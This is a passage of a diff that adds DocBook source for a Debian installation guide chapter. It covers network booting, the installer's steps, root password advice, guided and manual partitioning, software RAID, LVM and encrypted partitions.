+      (which has several names, such as <acronym>PXE</acronym> or
+      <acronym>TFTP</acronym> boot) can be a life-saver if the
+      computer does not have a CD-ROM reader, or if the BIOS can't
+      boot from such media.</para>
+
+      <para>This installation method works in two steps. First, while
+      booting the computer, the BIOS (or the network card) issues a
+      BOOTP/DHCP request to automatically acquire an IP address. When a
+      BOOTP or DHCP server returns a response, it includes a filename, as
+      well as network settings. After having configured the network, the
+      client computer then issues a TFTP (Trivial File Transfer Protocol)
+      request for a file whose name was previously indicated. Once this
+      file is acquired, it is executed as though it were a bootloader. This
+      then launches the Debian installation program, which is executed as
+      though it were running from the hard drive, a CD-ROM, or a USB
+      key.</para>
+
+      <para>All the details of this method are available in the
+      installation guide (“Preparing files for TFTP Net Booting”
+      section).
+      <ulink type="block" url="http://www.debian.org/releases/stable/amd64/ch05s01.html#boot-tftp" />
+      <ulink type="block" url="http://www.debian.org/releases/stable/amd64/ch04s05.html" />
+      </para>
+    </section>
+    <section id="sect.install-auto">
+      <title>Other Installation Methods</title>
+
+      <para>When we have to deploy customized installations for a large
+      number of computers, we generally choose an automated rather than a
+      manual installation method. Depending on the situation and the
+      complexity of the installations to be made, we can use FAI (Fully
+      Automatic Installer, described in <xref linkend="sect.fai" />), or even a
+      customized installation DVD with preseeding (see <xref linkend="sect.d-i-preseeding" />).</para>
+    </section>
+  </section>
+  <section id="sect.installation-steps">
+    <title>Installing, Step by Step</title>
+    <section id="sect.install-boot">
+      <title>Booting and Starting the Installer</title>
+
+      <para>Once the BIOS has begun booting from the CD- or DVD-ROM, the
+      Isolinux bootloader menu appears. At this stage, the Linux kernel is
+      not yet loaded; this menu allows you to choose the kernel to boot and
+      enter possible parameters to be transferred to it in the
+      process.</para>
+
+      <para>For a standard installation, you only need to choose
+      “Install” or “Graphical install” (with the arrow keys), then
+      press the <keycap>Enter</keycap> key to initiate the remainder
+      of the installation process. If the DVD-ROM is a “Multi-arch” disk,
+      and the machine has an Intel or AMD 64 bit processor, those menu
+      options enable the installation of the 64 bit variant
+      (<emphasis>amd64</emphasis>) and the installation of the 32 bit
+      variant remains available in a dedicated sub-menu (“32-bit install
+      options”). If you have a 32 bit processor, you don't get a choice
+      and the menu entries install the 32 bit variant
+      (<emphasis>i386</emphasis>).
+      </para>
+
+      <sidebar>
+        <title><emphasis>GOING FURTHER</emphasis> 32 or 64 bits?</title>
+        <indexterm><primary>PAE</primary></indexterm>
+        <indexterm><primary>Physical Address Extension</primary></indexterm>
+        <indexterm><primary>32/64 bits, choice</primary></indexterm>
+
+	<para>The fundamental difference between 32 and 64 bit systems is
+	the size of memory addresses. In theory, a 32 bit system can not
+	work with more than 4 GB of RAM (2<superscript>32</superscript>
+	bytes). In practice, it is possible to work around this limitation
+	by using the <literal>686-pae</literal> kernel variant, so long
+	as the processor handles the PAE (Physical Address Extension)
+	functionality. Using it does have a notable influence on system
+	performance, however. This is why it is useful to use the 64 bit
+	mode on a server with a large amount of RAM.</para>
+
+	<para>For an office computer (where a few percent difference in
+	performance is negligible), you must keep in mind that some
+	proprietary programs are not available in 64 bit versions (such as
+        Skype, for example). It is technically possible to make them work
+        on 64 bit systems, but you have to install the 32 bit versions of
+        all the necessary libraries (see <xref linkend="sect.multi-arch" />),
+        and sometimes to use <command>setarch</command> or
+        <command>linux32</command> (in the <emphasis role="pkg">util-linux</emphasis> package) to trick applications
+	regarding the nature of the system.
+	<indexterm><primary><command>setarch</command></primary></indexterm>
+	<indexterm><primary><command>linux32</command></primary></indexterm></para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>IN PRACTICE</emphasis> Installation alongside an existing Windows system</title>
+        <indexterm><primary>dual boot</primary></indexterm>
+
+	<para>If the computer is already running Windows, it is not
+	necessary to delete the system in order to install Debian. You can
+	have both systems at once, each installed on a separate disk or
+	partition, and choose which to start when booting the computer.
+	This configuration is often called “dual boot”, and the Debian
+	installation system can set it up. This is done during the hard
+	drive partitioning stage of installation and while setting up the
+	bootloader (see the sidebars <xref linkend="sidebar.shrinking-partition" />
+	and <xref linkend="sidebar.bootloader-dual-boot" />).</para>
+
+	<para>If you already have a working Windows system, you can even
+	avoid using a CD-ROM; Debian offers a Windows program that
+	will download a light Debian installer and set it up on the hard
+	disk. You then only need to reboot the computer and choose between
+	normal Windows boot or booting the installation program. You can
+	also find it on a dedicated website with a rather explicit name…
+	<ulink type="block" url="http://ftp.debian.org/debian/tools/win32-loader/stable/" />
+        <ulink type="block" url="http://www.goodbye-microsoft.com/" />
+        </para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> Bootloader</title>
+        <indexterm><primary>loader</primary><secondary>bootloader</secondary></indexterm>
+        <indexterm><primary>bootloader</primary></indexterm>
+        <indexterm><primary>boot</primary><secondary>loader</secondary></indexterm>
+
+	<para>The bootloader is a low-level program that is
+	responsible for booting the Linux kernel just after the BIOS
+	passes off its control. To handle this task, it must be able
+	to locate the Linux kernel to boot on the disk. On the i386
+	and amd64 architectures, the two most used programs to perform
+	this task are LILO, the older of the two, and GRUB, its modern
+	replacement. Isolinux and Syslinux are alternatives frequently
+	used to boot from removable media.</para>
+      </sidebar>
+
+      <para>Each menu entry hides a specific boot command line, which can
+      be configured as needed by pressing the <keycap>TAB</keycap> key
+      before validating the entry and booting. The “Help” menu entry
+      displays the old command line interface, where the
+      <keycap>F1</keycap> to <keycap>F10</keycap> keys display different
+      help screens detailing the various options available at the prompt.
+      You will rarely need to use this option except in very specific
+      cases.</para>
+
+      <para>The “expert” mode (accessible in the “Advanced options”
+      menu) details all possible options in the process of installation,
+      and allows navigation between the various steps without them
+      happening automatically in sequence. Be careful, this very verbose
+      mode can be confusing due to the multitude of configuration choices
+      that it offers.</para>
+
+      <figure>
+        <title>Boot screen</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/inst-boot.png" scalefit="1" width="65%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <para>Once booted, the installation program guides you step by
+      step throughout the process. This section presents each of these
+      steps in detail. Here we follow the process of an installation
+      from an amd64 DVD-ROM (more specifically, the rc3 version
+      of the installer for Stretch); <emphasis>netinst</emphasis>
+      installations, as well as the final release of the installer,
+      may look slightly different. We will also address installation
+      in graphical mode, but the only difference from “classic”
+      (text-mode) installation is in the visual appearance.</para>
+    </section>
+    <section id="sect.install-lang">
+      <title>Selecting the language</title>
+      <indexterm><primary>choice</primary><secondary>of language</secondary></indexterm>
+
+      <para>The installation program begins in English, but the first step
+      allows the user to choose the language that will be used in the rest
+      of the process. Choosing French, for example, will provide an
+      installation entirely translated into French (and a system configured
+      in French as a result). This choice is also used to define more
+      relevant default choices in subsequent stages (notably the keyboard
+      layout).</para>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> Navigating with the keyboard</title>
+
+	<para>Some steps in the installation process require you to enter
+	information. These screens have several areas that may “have
+	focus” (text entry area, checkboxes, list of choices, OK and
+	Cancel buttons), and the <keycap>TAB</keycap> key allows you to
+	move from one to another.</para>
+
+	<para>In graphical mode, you can use the mouse as you would
+	normally on an installed graphical desktop.</para>
+      </sidebar>
+
+      <figure role="flow.inline">
+        <title>Selecting the language</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/inst-lang.png" scalefit="1" width="50%" />
+          </imageobject>
+        </mediaobject>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/inst-lang-txt.png" scalefit="1" width="50%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+    </section>
+    <section id="sect.install-country">
+      <title>Selecting the country</title>
+      <indexterm><primary>choice</primary><secondary>of country</secondary></indexterm>
+
+      <para>The second step consists in choosing your country.
+      Combined with the language, this information enables the program
+      to offer the most appropriate keyboard layout.  This will also
+      influence the configuration of the time zone. In the United
+      States, a standard QWERTY keyboard is suggested, and a choice of
+      appropriate time zones is offered.</para>
+
+      <figure role="flow.inline">
+        <title>Selecting the country</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/inst-country.png" scalefit="1" width="50%" />
+          </imageobject>
+        </mediaobject>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/inst-country-txt.png" scalefit="1" width="50%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+    </section>
+    <section id="sect.install-keyboard">
+      <title>Selecting the keyboard layout</title>
+      <indexterm><primary>keyboard layout</primary></indexterm>
+      <indexterm><primary>layout, keyboard</primary></indexterm>
+
+      <para>The proposed “American English” keyboard corresponds to the
+      usual QWERTY layout.</para>
+
+      <figure role="flow.inline">
+        <title>Choice of keyboard</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/inst-keyboard.png" scalefit="1" width="50%" />
+          </imageobject>
+        </mediaobject>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/inst-keyboard-txt.png" scalefit="1" width="50%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+    </section>
+    <section id="sect.install-detect-hardware">
+      <title>Detecting Hardware</title>
+
+      <para>This step is completely automatic in the vast majority of
+      cases. The installer detects your hardware, and tries to identify the
+      CD-ROM drive used in order to access its content. It loads the
+      modules corresponding to the various hardware components detected,
+      and then “mounts” the CD-ROM in order to read it. The previous
+      steps were completely contained in the boot image included on the CD,
+      a file of limited size and loaded into memory by the BIOS when
+      booting from the CD.</para>
+
+      <para>The installer can work with the vast majority of drives,
+      especially standard ATAPI peripherals (sometimes called IDE and
+      EIDE). However, if detection of the CD-ROM reader fails, the
+      installer offers the choice to load a kernel module (for instance
+      from a USB key) corresponding to the CD-ROM driver.</para>
+    </section>
+    <section id="sect.install-load-components">
+      <title>Loading Components</title>
+
+      <para>With the contents of the CD now available, the installer
+      loads all the files necessary to continue with its work. This
+      includes additional drivers for the remaining hardware (especially
+      the network card), as well as all the components of the installation
+      program.</para>
+    </section>
+    <section id="sect.install-detect-network">
+      <title>Detecting Network Hardware</title>
+
+      <para>This automatic step tries to identify the network card and load
+      the corresponding module. If automatic detection fails, you can
+      manually select the module to load. If no module works, it is
+      possible to load a specific module from a removable device. This
+      last solution is usually only needed if the appropriate driver is not
+      included in the standard Linux kernel, but available elsewhere, such
+      as the manufacturer's website.</para>
+
+      <para>This step must absolutely be successful for
+      <emphasis>netinst</emphasis> installations, since the Debian
+      packages must be loaded from the network.</para>
+    </section>
+    <section id="sect.install-network-config">
+      <title>Configuring the Network</title>
+      <indexterm><primary>configuration</primary><secondary>network</secondary><tertiary>static</tertiary></indexterm>
+      <indexterm><primary>configuration</primary><secondary>network</secondary><tertiary>DHCP</tertiary></indexterm>
+
+      <para>In order to automate the process as much as possible, the
+      installer attempts an automatic network configuration by DHCP
+      (for IPv4) and by IPv6 network discovery. If this fails, it
+      offers more choices: try again with a normal DHCP configuration,
+      attempt DHCP configuration by declaring the name of the machine,
+      or set up a static network configuration.</para>
+
+      <para>This last option requires an IP address, a subnet mask, an IP
+      address for a potential gateway, a machine name, and a domain
+      name.</para>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> Configuration without DHCP</title>
+
+	<para>If the local network is equipped with a DHCP server that you
+	do not wish to use because you prefer to define a static IP address
+	for the machine during installation, you can add the
+	<userinput>netcfg/use_dhcp=false</userinput> option when booting
+	from the CD-ROM. You just need to go to the desired menu entry by
+	pressing the <keycap>TAB</keycap> key and add the desired option
+	before pressing the <keycap>Enter</keycap> key.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>BEWARE</emphasis> Do not improvise</title>
+
+	<para>Many local area networks are based on an implicit assumption
+	that all machines can be trusted, and inadequate configuration of a
+	single computer will often perturb the whole network. As a result,
+	do not connect your machine to a network without first agreeing
+	with its administrator on the appropriate settings (for example,
+	the IP address, netmask, and broadcast address).</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Administrator Password</title>
+      <indexterm><primary>account</primary><secondary>administrator account</secondary></indexterm>
+
+      <para>The super-user root account, reserved for the machine's
+      administrator, is automatically created during installation; this is
+      why a password is requested. The installer also asks for a
+      confirmation of the password to prevent any input error which would
+      later be difficult to amend.</para>
+
+      <figure>
+        <title>Administrator Password</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/inst-rootpw.png" scalefit="1" width="65%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <sidebar>
+        <title><emphasis>SECURITY</emphasis> Administrator password</title>
+
+	<para>The root user's password should be long (8 characters or
+	more) and impossible to guess. Indeed, any computer (and a fortiori
+	any server) connected to the Internet is regularly targeted by
+	automated connection attempts with the most obvious passwords.
+	Sometimes it may even be subject to dictionary attacks, in which
+	many combinations of words and numbers are tested as password.
+	Avoid using the names of children or parents, dates of birth, etc.:
+	many of your co-workers might know them, and you rarely want to
+	give them free access to the computer in question.</para>
+
+	<para>These remarks are equally applicable for other user
+	passwords, but the consequences of a compromised account are less
+	drastic for users without administrative rights.</para>
+
+	<para>If inspiration is lacking, do not hesitate to use password
+	generators, such as <command>pwgen</command> (in the package of the
+	same name).</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Creating the First User</title>
+
+      <para>Debian also imposes the creation of a standard user account so
+      that the administrator doesn't get into the bad habit of working as
+      root. The precautionary principle essentially means that each task is
+      performed with the minimum required rights, in order to limit the
+      damage caused by human error. This is why the installer will ask for
+      the complete name of this first user, their username, and their
+      password (twice, to prevent the risk of erroneous input).</para>
+
+      <figure>
+        <title>Name of the first user</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/inst-username.png" scalefit="1" width="65%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+    </section>
+    <section id="sect.install-clock-config">
+      <title>Configuring the Clock</title>
+
+      <para>If the network is available, the system's internal clock is
+      updated (in a one-shot way) from an NTP server. This way the
+      timestamps on logs will be correct from the first boot. For them to
+      remain consistently precise over time, an NTP daemon needs to be set
+      up after initial installation (see <xref linkend="sect.time-synchronization" />).</para>
+    </section>
+    <section id="sect.install-detect-disks">
+      <title>Detecting Disks and Other Devices</title>
+
+      <para>This step automatically detects the hard drives on which Debian
+      may be installed. They will be presented in the next step:
+      partitioning.</para>
+    </section>
+    <section id="sect.install-partman">
+      <title>Starting the Partitioning Tool</title>
+      <indexterm><primary>partitioning</primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> Uses of partitioning</title>
+
+	<para>Partitioning, an indispensable step in installation, consists
+	in dividing the available space on the hard drives (each
+	subdivision thereof being called a “partition”) according to
+	the data to be stored on it and the use for which the computer is
+	intended. This step also includes choosing the filesystems to be
+	used. All of these decisions will have an influence on performance,
+	data security, and the administration of the server.</para>
+      </sidebar>
+
+      <para>The partitioning step is traditionally difficult for new users.
+      It is necessary to define the various portions of the disks (or
+      “partitions”) on which the Linux filesystems and virtual memory
+      (swap) will be stored. This task is complicated if another operating
+      system that you want to keep is already on the machine. Indeed, you
+      will then have to make sure that you do not alter its partitions (or
+      that you resize them without causing damage).</para>
+
+      <para>Fortunately, the partitioning software has a “guided” mode
+      which recommends partitions for the user to make — in most cases,
+      you can simply validate the software's suggestions.</para>
+
+      <figure>
+        <title>Choice of partitioning mode</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/inst-partman.png" scalefit="1" width="65%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <para>The first screen in the partitioning tool offers the choice of
+      using an entire hard drive to create various partitions. For a (new)
+      computer which will solely use Linux, this option is clearly the
+      simplest, and you can choose the option “Guided - use entire
+      disk”. If the computer has two hard drives for two operating
+      systems, setting one drive for each is also a solution that can
+      facilitate partitioning. In both of these cases, the next screen
+      offers to choose the disk where Linux will be installed by selecting
+      the corresponding entry (for example, “SCSI3 (0,0,0) (sda) - 17.2
+      GB ATA VBOX HARDDISK”). You then start guided partitioning.</para>
+
+      <figure>
+        <title>Disk to use for guided partitioning</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/inst-partman-disk.png" scalefit="1" width="65%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <para>Guided partitioning can also set up LVM logical volumes instead
+      of partitions (see below). Since the remainder of the operation is
+      the same, we will not go over the option “Guided - use entire disk
+      and set up LVM” (encrypted or not).</para>
+
+      <para>In other cases, when Linux must work alongside other already
+      existing partitions, you need to choose manual partitioning.</para>
+      <section id="sect.install-autopartman-mode">
+        <title>Guided partitioning</title>
+        <indexterm><primary>partitioning</primary><secondary>guided partitioning</secondary></indexterm>
+
+	<para>The guided partitioning tool offers three partitioning
+	methods, which correspond to different usages.</para>
+
+        <figure>
+          <title>Guided partitioning</title>
+          <mediaobject>
+            <imageobject>
+              <imagedata fileref="images/inst-autopartman-mode.png" scalefit="1" width="65%" />
+            </imageobject>
+          </mediaobject>
+        </figure>
+
+	<para>The first method is called “All files in one partition”. The
+	entire Linux system tree is stored in a single filesystem,
+	corresponding to the root <filename>/</filename> directory. This
+	simple and robust partitioning fits perfectly for personal or
+	single-user systems. In fact, two partitions will be created: the
+	first will house the complete system, the second the virtual memory
+	(swap).</para>
+
+	<para>The second method, “Separate <filename>/home/</filename>
+	partition”, is similar, but splits the file hierarchy in two: one
+	partition contains the Linux system (<filename>/</filename>), and
+	the second contains “home directories” (meaning user data, in
+	files and subdirectories available under
+	<filename>/home/</filename>).</para>
+
+	<para>The last partitioning method, called “Separate
+	<filename>/home</filename>,
+	<filename>/var</filename>, and <filename>/tmp</filename>
+	partitions”, is appropriate for servers and multi-user systems.
+	It divides the file tree into many partitions: in addition to the
+	root (<filename>/</filename>) and user accounts
+	(<filename>/home/</filename>) partitions, it also has partitions
+	for server software data (<filename>/var/</filename>), and temporary files
+	(<filename>/tmp/</filename>). These divisions have several
+	advantages. Users can not lock up the server by consuming all
+	available hard drive space (they can only fill up
+	<filename>/tmp/</filename> and <filename>/home/</filename>). The
+	daemon data (especially logs) can no longer clog up the rest of the
+	system.</para>
+
+        <sidebar>
+          <title><emphasis>BACK TO BASICS</emphasis> Choosing a filesystem</title>
+          <indexterm><primary>system</primary><secondary>filesystem</secondary></indexterm>
+          <indexterm><primary>file</primary><secondary>system</secondary></indexterm>
+
+	  <para>A filesystem defines the way in which data is
+	  organized on the hard drive. Each existing filesystem has
+	  its merits and limitations. Some are more robust, others
+	  more effective: if you know your needs well, choosing the
+	  most appropriate filesystem is possible. Various comparisons
+          have already been made; it seems that <emphasis>ReiserFS</emphasis> is
+	  particularly efficient for reading many small files;
+	  <emphasis>XFS</emphasis>, in turn, works faster with large
+	  files. <emphasis>Ext4</emphasis>, the default filesystem for
+	  Debian, is a good compromise, based on the three previous
+	  versions of filesystems historically used in Linux
+	  (<emphasis>ext</emphasis>, <emphasis>ext2</emphasis> and
+	  <emphasis>ext3</emphasis>). <emphasis>Ext4</emphasis>
+	  overcomes certain limitations of <emphasis>ext3</emphasis>
+	  and is particularly appropriate for very large capacity hard
+	  drives.  Another option would be to experiment with the very
+	  promising <emphasis>btrfs</emphasis>, which includes
+	  numerous features that require, to this day, the use of LVM
+	  and/or RAID.</para>
+
+	  <para>A journalized filesystem (such as
+	  <emphasis>ext3</emphasis>, <emphasis>ext4</emphasis>,
+	  <emphasis>btrfs</emphasis>, <emphasis>reiserfs</emphasis>, or
+	  <emphasis>xfs</emphasis>) takes special measures to make it
+	  possible to return to a prior consistent state after an abrupt
+	  interruption without completely analyzing the entire disk (as was
+	  the case with the <emphasis>ext2</emphasis> system). This
+	  functionality is carried out by filling in a journal that
+	  describes the operations to conduct prior to actually executing
+	  them. If an operation is interrupted, it will be possible to
+	  “replay” it from the journal. Conversely, if an interruption
+	  occurs during an update of the journal, the last requested change
+	  is simply ignored; the data being written could be lost, but
+	  since the data on the disk has not changed, they have remained
+	  coherent. This is nothing more nor less than a transactional
+	  mechanism applied to the filesystem.</para>
+        </sidebar>
+
+	<para>After choosing the type of partition, the software calculates
+	a suggestion, and describes it on the screen; the user can then
+	modify it if needed. You can, in particular, choose another
+	filesystem if the standard choice (<emphasis>ext4</emphasis>) isn't
+	appropriate. In most cases, however, the proposed partitioning is
+	reasonable and it can be accepted by selecting the “Finish
+	partitioning and write changes to disk” entry.</para>
+
+        <figure>
+          <title>Validating partitioning</title>
+          <mediaobject>
+            <imageobject>
+              <imagedata fileref="images/inst-partman-validation.png" scalefit="1" width="65%" />
+            </imageobject>
+          </mediaobject>
+        </figure>
+      </section>
+      <section id="sect.manual-partitioning">
+        <title>Manual Partitioning</title>
+        <indexterm><primary>partitioning</primary><secondary>manual partitioning</secondary></indexterm>
+
+	<para>Manual partitioning allows greater flexibility, allowing the
+	user to choose the purpose and size of each partition. Furthermore,
+	this mode is unavoidable if you wish to use software RAID.</para>
+
+        <sidebar id="sidebar.shrinking-partition">
+          <title><emphasis>IN PRACTICE</emphasis> Shrinking a Windows partition</title>
+          <indexterm><primary>resize a partition</primary></indexterm>
+          <indexterm><primary>shrink a partition</primary></indexterm>
+
+	  <para>To install Debian alongside an existing operating system
+	  (Windows or other), you must have some available hard drive space
+	  that is not being used by the other system in order to be able to
+	  create the partitions dedicated to Debian. In most cases, this
+	  means shrinking a Windows partition and reusing the freed
+	  space.</para>
+
+	  <para>The Debian installer allows this operation when using the
+	  manual mode for partitioning. You only need to choose the Windows
+	  partition and enter its new size (this works the same with both
+	  FAT and NTFS partitions).</para>
+        </sidebar>
+
+	<para>The first screen displays the available disks, their
+	partitions, and any possible free space that has not yet been
+	partitioned. You can select each displayed element; pressing the
+	<keycap>Enter</keycap> key then gives a list of possible
+	actions.</para>
+
+	<para>You can erase all partitions on a disk by selecting
+	it.</para>
+
+	<para>When selecting free space on a disk, you can manually create
+	a new partition. You can also do this with guided partitioning,
+	which is an interesting solution for a disk that already contains
+	another operating system, but which you may wish to partition for
+        Linux in a standard manner. See <xref linkend="sect.install-autopartman-mode" /> for more details on
+        guided partitioning.</para>
+
+        <sidebar>
+          <title><emphasis>BACK TO BASICS</emphasis> Mount point</title>
+          <indexterm><primary>mount point</primary></indexterm>
+          <indexterm><primary>point, mount point</primary></indexterm>
+
+	  <para>The mount point is the directory tree that will house the
+	  contents of the filesystem on the selected partition. Thus, a
+	  partition mounted at <filename>/home/</filename> is traditionally
+	  intended to contain user data.</para>
+
+	  <para>When this directory is named “<filename>/</filename>”,
+	  it is known as the <emphasis>root</emphasis> of the file tree,
+	  and therefore the root of the partition that will actually host
+	  the Debian system.</para>
+        </sidebar>
+
+        <sidebar>
+          <title><emphasis>BACK TO BASICS</emphasis> Virtual memory, swap</title>
+          <indexterm><primary>virtual memory</primary></indexterm>
+          <indexterm><primary>swap</primary></indexterm>
+          <indexterm><primary>partition</primary><secondary>swap partition</secondary></indexterm>
+          <indexterm><primary>swap partition</primary></indexterm>
+
+	  <para>Virtual memory allows the Linux kernel, when lacking
+	  sufficient memory (RAM), to free a bit of storage by storing the
+	  parts of the RAM that have been inactive for some time on the
+	  swap partition of the hard disk.</para>
+
+	  <para>To simulate the additional memory, Windows uses a swap file
+	  that is directly contained in a filesystem. Conversely, Linux
+	  uses a partition dedicated to this purpose, hence the term
+	  “swap partition”.</para>
+        </sidebar>
+
+	<para>When choosing a partition, you can indicate the manner in
+	which you are going to use it:</para>
+        <itemizedlist>
+          <listitem>
+	    <para>format it and include it in the file tree by choosing a
+	    mount point;</para>
+          </listitem>
+          <listitem>
+	    <para>use it as a swap partition;</para>
+          </listitem>
+          <listitem>
+	    <para>make it into a “physical volume for encryption” (to
+	    protect the confidentiality of data on certain partitions, see
+	    below);</para>
+          </listitem>
+          <listitem>
+	    <para>make it a “physical volume for LVM” (this concept is
+	    discussed in greater detail later in this chapter);</para>
+          </listitem>
+          <listitem>
+	    <para>use it as a RAID device (see later in this
+	    chapter);</para>
+          </listitem>
+          <listitem>
+	    <para>you can also choose not to use it, and therefore
+	    leave it unchanged.</para>
+          </listitem>
+        </itemizedlist>
+      </section>
+      <section id="sect.install-software-raid">
+        <title>Configuring Multidisk Devices (Software RAID)</title>
+        <indexterm><primary>RAID</primary><secondary>Software RAID</secondary></indexterm>
+        <indexterm><primary>Software RAID</primary></indexterm>
+        <indexterm><primary>device</primary><secondary>multi-disk device</secondary></indexterm>
+
+	<para>Some types of RAID allow the duplication of information
+	stored on hard drives to prevent data loss in the event of a
+	hardware problem affecting one of them. Level 1 RAID keeps a
+	simple, identical copy (mirror) of a hard drive on another drive,
+	while level 5 RAID splits redundant data over several disks, thus
+	allowing the complete reconstruction of a failing drive.</para>
+
+	<para>We will only describe level 1 RAID, which is the simplest to
+	implement. The first step involves creating two partitions of
+	identical size located on two different hard drives, and to label
+	them “physical volume for RAID”.</para>
+
+	<para>You must then choose “Configure software RAID” in the
+	partitioning tool to combine these two partitions into a new
+	virtual disk and select “Create MD device” in the configuration
+	screen. You then need to answer a series of questions about this
+	new device. The first question asks about the RAID level to use,
+	which in our case will be “RAID1”. The second question asks
+	about the number of active devices — two in our case, which is
+	the number of partitions that need to be included in this MD
+	device. The third question is about the number of spare devices —
+	0; we have not planned any additional disk to take over for a
+	possible defective disk. The last question requires you to choose
+	the partitions for the RAID device — these would be the two
+	that we have set aside for this purpose (make sure you only select
+	the partitions that explicitly mention “raid”).</para>
+
+	<para>Back to the main menu, a new virtual “RAID” disk appears.
+	This disk is presented with a single partition which can not be
+	deleted, but whose use we can choose (just like for any other
+	partition).</para>
+
+	<para>For further details on RAID functions, please refer to <xref linkend="sect.raid-soft" />.</para>
+      </section>
+      <section id="sect.install-lvm">
+        <title>Configuring the Logical Volume Manager (LVM)</title>
+        <indexterm><primary>LVM</primary><secondary>during installation</secondary></indexterm>
+        <indexterm><primary>Logical Volume Manager</primary><secondary>during installation</secondary></indexterm>
+
+	<para>LVM allows you to create “virtual” partitions that span
+	over several disks. The benefits are twofold: the size of the
+	partitions are no longer limited by individual disks but by
+	their cumulative volume, and you can resize existing
+	partitions at any time, possibly after adding an additional
+	disk when needed.</para>
+
+	<para>LVM uses a particular terminology: a virtual partition is a
+	“logical volume”, which is part of a “volume group”, or an
+	association of several “physical volumes”. Each of these terms
+	in fact corresponds to a “real” partition (or a software RAID
+	device).</para>
+        <indexterm><primary>volume</primary><secondary>logical volume</secondary></indexterm>
+        <indexterm><primary>volume</primary><secondary>physical volume</secondary></indexterm>
+        <indexterm><primary>group</primary><secondary>of volumes</secondary></indexterm>
+        <indexterm><primary>volume</primary><secondary>group</secondary></indexterm>
+
+	<para>This technique works in a very simple way: each volume,
+	whether physical or logical, is split into blocks of the same size,
+	which are made to correspond by LVM. The addition of a new disk
+	will cause the creation of a new physical volume, and these new
+	blocks can be associated to any volume group. All of the partitions
+	in the volume group that is thus expanded will have additional
+	space into which they can extend.</para>
+
+	<para>The partitioning tool configures LVM in several
+	steps. First you must create on the existing disks the
+	partitions that will be “physical volumes for LVM”. To
+	activate LVM, you need to choose “Configure the Logical Volume
+	Manager (LVM)”, then on the same configuration screen “Create
+	a volume group”, to which you will associate the existing
+	physical volumes. Finally, you can create logical volumes
+	within this volume group. Note that the automatic partitioning
+	system can perform all these steps automatically.</para>
+
+	<para>In the partitioning menu, each physical volume will appear as
+	a disk with a single partition which can not be deleted, but that
+	you can use as desired.</para>
+
+	<para>The usage of LVM is described in further detail in <xref linkend="sect.lvm" />.</para>
+      </section>
+      <section>
+        <title>Setting Up Encrypted Partitions</title>
+        <indexterm><primary>LUKS</primary></indexterm>
+        <indexterm><primary>dm-crypt</primary></indexterm>
+        <indexterm><primary>partition</primary><secondary>encrypted</secondary></indexterm>
+        <indexterm><primary>partition encryption</primary></indexterm>
+        <indexterm><primary>confidentiality</primary><secondary>files</secondary></indexterm>
+        <indexterm><primary>file</primary><secondary>confidentiality</secondary></indexterm>
+
+	<para>To guarantee the confidentiality of your data, for instance
+	in the event of the loss or theft of your computer or a hard drive,
+	it is possible to encrypt the data on some partitions. This feature
+	can be added underneath any filesystem, since, as for LVM, Linux
+	(and more particularly the dm-crypt driver) uses the Device Mapper
+	to create a virtual partition (whose content is protected) based on
+	an underlying partition that will store the data in an encrypted
+	form (thanks to LUKS, Linux Unified Key Setup, a standard format
+	that enables the storage of encrypted data as well as
+	meta-information that indicates the encryption algorithms
+	used).</para>
+
+        <sidebar id="sidebar.encrypted-swap-partition">
+          <title><emphasis>SECURITY</emphasis> Encrypted swap partition</title>
+
+	  <para>When an encrypted partition is used, the encryption key is
+	  stored in memory (RAM). Since retrieving this key allows the
+	  decryption of the data, it is of utmost importance to avoid
+	  leaving a copy of this key that would be accessible to the
+	  possible thief of the computer or hard drive, or to a maintenance
+	  technician. This is however something that can easily occur with
+	  a laptop, since when hibernating the contents of RAM is stored on
+	  the swap partition. If this partition isn't encrypted, the thief
+	  may access the key and use it to decrypt the data from the
+	  encrypted partitions. This is why, when you use encrypted
+	  partitions, it is imperative to also encrypt the swap
+	  partition!</para>
+
+	  <para>The Debian installer will warn the user if they try to make
+	  an encrypted partition while the swap partition isn't
+	  encrypted.</para>
+        </sidebar>
+
+	<para>To create an encrypted partition, you must first assign an
+	available partition for this purpose. To do so, select a partition
+	and indicate that it is to be used as a “physical volume for
+	encryption”. After partitioning the disk containing the physical
+	volume to be made, choose “Configure encrypted volumes”. The
+	software will then propose to initialize the physical volume with
+	random data (making the localization of the real data more
+	difficult), and will ask you to enter an “encryption
+	passphrase”, which you will have to enter every time you boot
+	your computer in order to access the content of the encrypted
+	partition. Once this step has been completed, and you have returned
+	to the partitioning tool menu, a new partition will be available in
+	an “encrypted volume”, which you can then configure just like
+	any other partition. In most cases, this partition is used as a
+	physical volume for LVM so as to protect several partitions (LVM
+	logical volumes) with the same encryption key, including the swap
+	partition (see sidebar <xref linkend="sidebar.encrypted-swap-partition" />).</para>
+      </section>
+    </section>
+    <section>
+      <title>Installing the Base System</title>
+      <indexterm><primary>system</primary><secondary>base</secondary></indexterm>
+
